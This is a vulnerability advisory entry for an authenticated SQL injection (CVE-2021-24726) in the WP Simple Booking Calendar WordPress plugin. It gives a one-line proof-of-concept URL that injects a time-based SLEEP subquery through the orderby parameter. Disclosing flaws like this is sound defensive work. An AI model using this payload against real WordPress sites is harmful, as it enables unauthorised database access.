WP Simple Booking Calendar <= 2.0.6 (before 07/12/2021) – Authenticated SQL Injection | CVE 2021-24726 | Plugin Vulnerabilities

Description

The plugin did not escape, validate or sanitise the orderby parameter in its Search Calendars action, before using it in a SQL statement, leading to an authenticated SQL injection issue

Note (WPScanTeam): The issue was fixed without bumping the version, so there are two 2.0.6 versions out there, one vulnerable, the other with the fix.

Proof of Concept

https://example.com/wp-admin/admin.php?page=wpsbc-calendars&paged=1&s=MyCal&orderby=name,%28SELECT%20*%20FROM%20%28SELECT%28SLEEP%286%29%29%29a%29&paged=1

Affects Plugins

wp-simple-booking-calendar

Fixed in 2.0.6

References

CVE

URL

https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=29176

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Martin Vierula of Trustwave

Verified

Yes

WPVDB ID

f85b6033-d7c1-45b7-b3b0-8967f7373bb8

Timeline

Publicly Published

2021-08-06 (about 4 years ago)

Added

2021-08-09 (about 4 years ago)

Last Updated

2023-01-25 (about 2 years ago)

Other

Published

Title

Published

2018-02-22

Title

Custom Permalinks <= 1.1 - Authenticated SQL Injection

Published

2022-05-09

Title

Note Press <= 0.1.10 - Admin+ SQLi via id

Published

2014-08-01

Title

Mingle Forum <= 1.0.31 - SQL Injection

Published

2023-12-28

Title

WP Adminify < 3.1.7 - Authenticated(Administrator+) SQL Injection

Published

2014-08-01

Title

Wordpress <= 2.3.1 - Charset Remote SQL Injection